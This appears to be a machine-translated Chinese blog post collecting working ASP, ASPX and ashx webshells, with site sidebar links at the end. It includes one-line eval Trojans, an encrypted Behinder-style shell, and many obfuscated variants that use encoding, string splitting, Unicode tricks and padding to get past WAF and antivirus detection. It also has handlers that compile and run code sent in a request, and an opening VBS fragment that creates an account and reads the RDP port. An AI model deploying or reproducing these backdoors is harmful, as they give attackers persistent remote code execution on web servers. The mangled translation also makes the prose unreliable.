od.SetPassword strPassword
od.SetInfo
Set of=GetObject(os&"/iiice",user)
oe.add os&"/iiice"
// Turn on 3389 Of
Dim ReadComputerName
Set ReadComputerName=WScript.CreateObject("WScript.Shell")
Dim TSName,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSName=ReadComputerName.RegRead(TSRegPath)
WScript.Echo("TermService port is:"&TSName)
aspx Typical characteristics of
①unicode characteristic
and jsp The difference between , He only supports 26 A letter for unicode code Other codes cannot
ASPX Also supports \unicode
Such as xyz Using tools will turn into
\u0078\u0079\u007a
But he also supports
\u0078y\u007a
\u0078\u0079z
\u0078\u0079\u007A
\U00000078\u0079z
\U00000078\u200c\u200d\u200d\U0000200d\u0079z
② Annotation properties
/*1212121*/ Such as
③<%%> Truncation feature
Support multiple <% %> To splice statements
④ Empty character connection
\u200c \u200d \u200e \u200f
⑤@ Symbol
Added @ Symbols do not affect parsing
⑥ Head characteristics
That is, the identification of the head can be changed
If the head is about to be changed
<%@ Page Language="Jscript"%>
<%@Page Language=JS%>
<%@ Page Language="C#" %>
Replace with
<%@Language=CSHARP%>
⑦ Character encoding format transformation characteristics
VSCODE Modify encoding format , If Waf Encoding is not supported UTF16 Code words , It also exists waf The possibility of bypassing
//⑧ Curly braces and semicolon features asp.net In the environment
// principle :{} And semicolon ; A lot of such confusion can be added at the end of the original syntax , It will not affect its original parsing
<% @page language=c#%>;;;;;;;;;;;;;;;;;;;;
<%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b");{
{
{
}}} byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);{
{
{
;}}} Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);;;;;;;;;;;;;;;;;;;;;%>
//⑨ Code block format
<% @language="C#" %>
<%Response.Write("hello world ashx");%>
// The technique is as follows
<script language=csharp runat=server>
void page_load(){
Response.Write("hello world");}
</script>
// It is using void page_load() The way around
<script language=csharp runat=server>
void page_load(){
Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);
System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);
}
</script>
//⑩ Line feed feature
aspx Line feed feature is also supported
// 11、 ... and .c# Of /// Features and xml Annotation symbol properties
For example, the following
<%
@
language
=
c#
%>
<%
@Import
Namespace="System.Reflection"%>
<%Session.Add("k",
//@#@!#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#
"e45e329feb5d925b"); byte[]
//@#@!#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#
k = Encoding.Default.GetBytes(Session[0] + ""),
//@#@!#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#
c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);
//@#@!#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#[email protected]#
Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
asp and aspx The difference and connection
1.)aspx Cannot perform asp Related to the grammar ,asp Can't do it aspx Related grammar
<%
dim aaa
aaa="sdasdasda"
//for i=1 to 10
//response.write(time())
response.write(aaa)
Response.Write(DateTime.Now.Date.ToShortDateString())
%>
// As above dim This is supported in aspx Running down , But none of the others , for example for loop
2.) Semicolon problem
asp The default syntax does not support semicolons , Not even a semicolon , Only @language=jscript Such prefixes support semicolons .
3.)aspx suffix + No prefix description support REM notes
under these circumstances ,aspx Suffix support rem xxx And single quotation marks , I won't support it // , /**/ , <!–>
As shown below
<%
dim aaa
aaa="sdasdasda"
response.write(aaa)
Response.Write("Test")
rem asdasdasdasdsaasdasdasdas
' asdasdasd
%>
I don't know what use this feature is ,aspx Suffix support asp The comment of does not support asp The grammar of , I want to use it aspx The grammar of must add c#, add c# Later, it can't support asp Notes for
4.)aspx There is no need to close
asp If it is not closed, it will report an error , And if you use aspx suffix
<%execute request("cmd")%>
2. Typical horse
In a word, Trojans
asp Of
<% execute(request("value")) %>
<%eval request ("value")%>
aspx Of
<%@ Page Language="Jscript" %>
<% eval(Request.Item["value"]) %>
Ice scorpion asp Horse The conventional
<%
Response.CharSet = "UTF-8"
k="e45e329feb5d925b" ' The key is the connection password 32 position md5 Before the value 16 position , Default connection password rebeyond
Session("k")=k
size=Request.TotalBytes
content=Request.BinaryRead(size)
For i=1 To size
result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
Next
execute(result)
%>
Transit horse
<%@ page Language="Jscript" %>
<%
System.IO.File.WriteAllText(System.Web.HttpContext.Current.Server.MapPath("")+"\\1.txt",System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String("YXNkYXNkc2Q=")));
%>
before bypass
//① Utilization function bypass Ideas --> Burst the first level back door asp The horse of
<%
Function b():
b = request("99999")
End Function
Function f():
eXecUTe(b())
End Function
f()
%>
//② class bypass asp The horse of
<%
Class zzz
private yyy
Private Sub Class_Initialize
yyy = ""
End Sub
public property let www(yyy)
execute(yyy)
end property
End Class
Set xxx= New zzz
dim vvv(7)
vvv(2)=request("99999")
xxx.www= vvv(2)
%>
//③ The idea of coding asp The horse of Back door code 1fg7wcusijnbhk
<%
Function fwomckmokef(fownmcjon)
fownmcjon = Split(fownmcjon,"()")
For z=1 To Ubound(fownmcjon)
fwomckmokef=fwomckmokef&Chr(fownmcjon(z)-98765)
Next
End Function
ExecuteGlobal fwomckmokef("()98866()"&"98883()98862()98873()"&"98797()98879()98866()98878()98882()98866()98880()98881()98805()"&"98799()98814()98867()98868()98820()98884()98864()98882()98880()98870()98871()"&""&"98875()98863()"&"98869()98872()98799()98806")
%>
//④aspx The horse of principle char() Don't kill if you pass the yard
<%@ Page Language="Jscript"%>
<%
var a = Request.Item["M"];
var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";// It's mainly this place Other places don't seem to care
eval(a,b);
Response.Write("Test");
%>
//⑤asp Of
<%
P=request("pass")
A=mid(P,1,1)
B=mid(P,2,9999)
eval A&B
%>
//aspx Of
<%@ Page Language="Jscript"%>
<%
var p = Request.Item["M"];
var a = p.substring(0,1);
var b = p.substring(1,99999);
var c = "un" + Char ( 115 ) + Char ( 97 ) + "fe";
eval(a+b,c);
%>
//aspx Principle char()
<%@ Page Language="Jscript"%>
<%
var a = "un" + Char ( 115 ) + Char ( 97 ) + "fe";
var b = Char ( 82 ) + Char ( 101 ) + Char ( 113 ) + Char ( 117 ) + Char ( 101 ) + Char ( 115 ) + Char ( 116 ) + Char ( 46 ) + Char ( 73 ) + Char ( 116 ) + Char ( 101 ) + Char ( 109 ) + Char ( 91 ) + Char ( 34 ) + Char ( 77 ) + Char ( 34 ) + Char ( 93 );
var M = eval(b,a);
var T = eval(M,a);
Response.Write("Test");
%>
//asp Of
<%
Function GetBaidu()
E = ("Request." & Chr ( 70 ) & "orm")
M = Chr ( 34 ) & ("M") & Chr ( 34 )
T = "eva" & Chr ( 108 ) & UnEscape("%20" & E & "%28" & M & "%29")
'%><%//%><%eXeCutegLobaL (T)
End Function
GetBaidu()
%>
//asp Of , Idea of filling dirty data bypass
<%
a="11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"
eval " "&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")
%>
// Use coding bypass The idea of
<%
Function test():
dim aaa
aaa="%65%76%61%6c%28%72%65%71%75%65%73%74%28%22%6d%72%36%22%29%29"
test = unescape(aaa)
End Function
eval(test())
%>
// Embedded url generation
<%
Function b():
dim aaa
aaa="%65%76%61%6c%28%72%65%71%75%65%73%74%28%22%6d%72%36%22%29%29"
b = unescape(aaa)
End Function
Function f():
eval(b())
End Function
f()
%>
//
<%@ language = VBscript %>
<%<!–%^_^%–>
SET LandGrey = server.CreateObject("mS"&chr(115)&"cR"&chr(105)&"pTCo"&Chr(110)&Chr(84)&"rOL.Sc"&chr(114)&"IpTCo"&Chr(110)&Chr(84)&"rOL.1″)
LandGrey.lANguaGE = cHr(86)&"BsC"&CHR(114)&chr(105)&"PT"
LandGrey.AddObject "REsponse", Response
LandGrey.AddObject "r"&chr(101)&"quEst", requesT
LandGrey.AddObject "s"&chr(101)&"ssIon", sessiOn
LandGrey.AddObject "serv"&chr(101)&"r", serVer
LandGrey.AddObject "apPlic"&CHR(97)&"tIon", application
x=("eV"&CHr(&0141)&"L"&Chr(40)&"rEqU"&cHr(101)&"St("&chr(34)&"fool"&chr(34)&CHR(41)&")")
LandGrey.eXECuTeStAtEmENt("eV"&CHr(&0141)&"L"&Chr(40)&"rEqU"&cHr(101)&"St("&chr(34)&"fool"&chr(34)&CHR(41)&")")
%>
3. Small tips
1.) How to get the backdoor password utilize response.write
<%
Function fwomckmokef(fownmcjon)
fownmcjon = Split(fownmcjon,"()")
For z=1 To Ubound(fownmcjon)
fwomckmokef=fwomckmokef&Chr(fownmcjon(z)-98765)
Next
End Function
response.write fwomckmokef("()98866()"&"98883()98862()98873()"&"98797()98879()98866()98878()98882()98866()98880()98881()98805()"&"98799()98814()98867()98868()98820()98884()98864()98882()98880()98870()98871()"&""&"98875()98863()"&"98869()98872()98799()98806")
%>
Special format horse
ashx Horse
ashx Horse 1
<%@ WebHandler Language="C#" class="DynamicCodeCompiler"%>
using System;
using System.Web;
using System.CodeDom.Compiler;
using System.Reflection;
using System.Text;
public partial class DynamicCodeCompiler : IHttpHandler
{
public bool IsReusable
{
get {
return false; }
}
public static string SourceText(string txt)
{
StringBuilder sb = new StringBuilder();
sb.Append("using System;");
sb.Append(Environment.NewLine);
sb.Append("namespace Neteye");
sb.Append(Environment.NewLine);
sb.Append("{");
sb.Append(Environment.NewLine);
sb.Append(" public class NeteyeInput");
sb.Append(Environment.NewLine);
sb.Append(" {");
sb.Append(Environment.NewLine);
sb.Append(" public void OutPut()");
sb.Append(Environment.NewLine);
sb.Append(" {");
sb.Append(Environment.NewLine);
sb.Append(Encoding.GetEncoding("UTF-8").GetString(Convert.FromBase64String(txt)));
sb.Append(Environment.NewLine);
sb.Append(" }");
sb.Append(Environment.NewLine);
sb.Append(" }");
sb.Append(Environment.NewLine);
sb.Append("}");
string code = sb.ToString();
return code;
}
public static void DynamicCodeExecute(string txt)
{
CodeDomProvider compiler = CodeDomProvider.CreateProvider("C#"); ; // compiler
CompilerParameters comPara = new CompilerParameters(); // Compiler parameters
comPara.ReferencedAssemblies.Add("System.dll");
comPara.GenerateExecutable = false;
comPara.GenerateInMemory = true;
CompilerResults compilerResults = compiler.CompileAssemblyFromSource(comPara, SourceText(txt));
Assembly objAssembly = compilerResults.CompiledAssembly;
object objInstance = objAssembly.CreateInstance("Neteye.NeteyeInput");
MethodInfo objMifo = objInstance.GetType().GetMethod("OutPut");
var result = objMifo.Invoke(objInstance, null);
}
public void ProcessRequest(HttpContext context)
{
context.Response.ContentType = "text/plain";
if (!string.IsNullOrEmpty(context.Request["txt"]))
{
//start calc: System.Diagnostics.Process.Start("cmd.exe","/c calc"); => U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MuU3RhcnQoImNtZC5leGUiLCIvYyBjYWxjIik7
//show ipconfig: System.Diagnostics.Process.Start("cmd.exe","/c ipconfig"); => U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MuU3RhcnQoImNtZC5leGUiLCIvYyBpcGNvbmZpZyIpOw==
DynamicCodeExecute(context.Request["txt"]);
context.Response.Write("Execute Status: Success!");
}
else
{
context.Response.Write("Just For Fun, Please Input txt!");
}
}
}
ashx Horse 2
<%@ WebHandler Language="C#" class="JscriptDynamicCodeCompiler"%>
using System;
using System.Web;
using System.CodeDom.Compiler;
using System.Reflection;
/// <summary>
/// code by Ivan1ee, just for fun!
/// </summary>
public static class DynamicCodeCompiler
{
private static Type _runType; private static object _runInstance;
private static readonly string _jscriptClassText =
@"import System;
class JScriptRun
{
public static function RunExp(expression : String) : String
{
return e/*@[email protected]*/v/*@[email protected]*/a/*@[email protected]*/l(expression);
}
}";
private static void Initialize()
{
CodeDomProvider compiler = CodeDomProvider.CreateProvider("Jscript");
CompilerParameters parameters = new CompilerParameters();
parameters.GenerateInMemory = true;
parameters.ReferencedAssemblies.Add("System.dll");
CompilerResults results = compiler.CompileAssemblyFromSource(parameters, _jscriptClassText.Replace("/*@[email protected]*/", ""));
Assembly assembly = results.CompiledAssembly;
_runType = assembly.GetType("JScriptRun");
_runInstance = Activator.CreateInstance(_runType);
}
public static string Run(string expression)
{
if (_runInstance == null)
Initialize();
object result = _runType.InvokeMember("RunExp", BindingFlags.InvokeMethod, null, _runInstance, new object[] {
expression });
return (result == null) ? null : result.ToString();
}
}
/// <summary>
/// Handler1 Summary description of
/// </summary>
public class JscriptDynamicCodeCompiler : IHttpHandler
{
public void ProcessRequest(HttpContext context)
{
context.Response.ContentType = "text/plain";
if (!string.IsNullOrEmpty(context.Request["txt"]))
{
//start calc: System.Diagnostics.Process.Start("cmd.exe","/c calc"); => U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MuU3RhcnQoImNtZC5leGUiLCIvYyBjYWxjIik7
//show ipconfig: System.Diagnostics.Process.Start("cmd.exe","/c ipconfig"); => U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MuU3RhcnQoImNtZC5leGUiLCIvYyBpcGNvbmZpZyIpOw==
DynamicCodeCompiler.Run(System.Text.Encoding.GetEncoding("UTF-8").GetString(Convert.FromBase64String(context.Request["txt"])));
context.Response.Write("Execute Status: Success!");
}
else
{
context.Response.Write("Just For Fun, Please Input txt!");
}
}
public bool IsReusable
{
get
{
return false;
}
}
}
java Memory horse
Java - SpringBoot Persistence WebShell( Adapt to any match JavaEE Standardized services )
https://github.com/threedr3am/ZhouYu
边栏推荐
- PHP利用某些函数bypass waf探讨
- Neuron 2.1.0 release: it supports sparkplug B specification and more complete industrial protocol support
- 《安富莱嵌入式周报》第275期:2022.07.18--2022.07.24
- Introduction to QT drawing system
- Cesium add dynamic pop-up
- 数仓搭建——DWS层
- LeetCode 2347. 最好的扑克手牌
- 文章复现:超分辨率网络FSRCNN
- [C language] file operation
- Lecture 16 of project practice: using the open close principle to realize the commodity price rule engine
猜你喜欢
Thoroughly understand kubernetes scheduling framework and plug-ins
"Wei Lai Cup" 2022 Niuke summer multi school training camp 3 supplementary problem solution (a, C, J)
Principle of logistic regression
数仓搭建——DWS层
If you are still using WiFi, you will be out: li-fi is better!!!
I want to get 20K after 3 years of experience, but I haven't got it for half a month?
Summary of common shortcut keys in idea
ICML2022 | 在线决策Transformer
总结:Prometheus存储
华为“天才少年”稚晖君又出新作,从零开始造“客制化”智能键盘
随机推荐
画刷和画笔
Dart 代码注释和文档编写规范
Centralized management of clusters
Qlib教程——基于源码(二)本地数据保存与加载
Cap principle of [distributed development]
String
Codeforces summer training weekly (7.21~7.27)
Data problems can also be found if there is a space at the end of the field value of MySQL query criteria
Count the number of given strings in a string
JG data reset (WD)
Thoroughly understand kubernetes scheduling framework and plug-ins
JUC concurrent programming learning
Niuke multi School Game 3 A, c+ weight segment tree
新安装的pip3,使用出现No module named ‘lsb_release‘的问题
面试题 01.08. 零矩阵
Anfulai embedded weekly report no. 275: 2022.07.18--2022.07.24
String
Flutter--密码登录注册界面
2022/07/27 learning notes (Day17) code blocks and internal classes
Lua进阶